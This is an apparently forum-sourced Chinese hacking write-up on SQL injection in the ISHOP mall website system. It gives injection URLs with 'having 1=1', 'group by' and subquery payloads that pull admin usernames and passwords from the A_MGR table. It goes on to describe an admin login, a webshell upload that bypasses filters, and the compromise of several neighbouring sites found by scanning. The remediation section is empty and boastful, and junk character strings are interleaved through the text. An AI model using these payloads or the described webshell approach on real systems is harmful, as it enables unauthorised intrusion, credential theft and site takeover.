ISHOP商场建站系统注入漏洞

admin

发现一个注入点
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
  z/ i& H* u9 X0 D" G3 Q2 G- `
习惯性的加’having1=1--
3 C- E$ U7 T5 G+ M: e5 z
3 n4 a$ s+ X+ l3 dhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
/ U8 T& f- Q# K4 J( V$ ~5 E( i% X
0

爆出Diary_A.dl_Title（这时候很激动啊）
2 X, u) q+ c7 c5 r$ K
  K2 ?. ]9 S- m. h1 L2 q那么继续
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—

" y6 e) K* p0 y6 \继续，一直爆下去
# I4 i  G) X+ A* {, W
爆到几个字段和表段 但是没找到需要的管理用户的字段

蛋疼了 怎么办 然后去后台登陆页看源码

: p% K( i% W0 f0
9 x' C9 K( p( C/ s0 |' y
Input name= “ADUID”
Input name= “ADPWD”
0 `" @6 S5 R9 O
很幸运 找到了字段那就继续
5 a; h+ M0 ]! j& i) y找到之后开始爆用户
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
爆密码
; [" k4 z3 M* x$ o+ u6 x% ?9 i0 X0 rhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
. m9 F. f4 D& d测试了下 这个注入点只能爆到文章哪里的表

头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了

又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了

: g# z, |$ H! t. M8 `9 Z# f473
% ?- R# Y) u$ C5 D% |7 h1 q, S, t
; {6 i4 I1 n+ C' T8 r0 ?6 s进后台
: R1 E& h! t0 P0 U

发现几个上传点 有的地方不能上传 而且防止恶意代码

没办法 各种百度各种找大牛 找到一只好像可以突破的马

- T$ H" C4 @! `9 L( i) l
在系统管理那里直接上传 不过没有显示地址
1 e% z; s( L4 b( ^  e9 Z/ s, F9 m
: s$ x6 K  _5 f: W再上传一次 抓包 搞定OK
! q& D* v7 P7 {5 I" J' U  s2 @
- C! y1 s/ h  M) {
+ [: b. m5 }; \7 L
472

" z1 \: F2 e  p1 I% n2 @晚上不行了 去睡觉。。。
第二天刚起床 闲的没事做继续日站吧
+ H- `. r. O, d% k
, _( y) D8 _/ N找个站 就把这个站的旁c扫了下
+ l, y' b3 P" j" t0 b7 k
$ y7 @1 T5 s' z( J发现c段也有一个购物站 ，然后还和这个站的模板差不多
7 T6 N% X: N  g+ k% y4 |
就找到会员登录口测试

, ^; C3 U8 f' a  O. O) b; _'and (select top 1 MGR_UID from A_MGR)>0—
果断爆到了 这时候我很激动 通杀

* x# g6 [- Z- a1 ~/ @再次翻c段

翻出几个站 都成功拿下

  v  H: U. g  l, A( C
+ w2 }. O  c% C, o7 ^* c
" b! G1 E# Q3 d0 T" \1 W4 H7 N5 x修复方案：
他们比我专业
4 b# I/ n8 c9 O: X​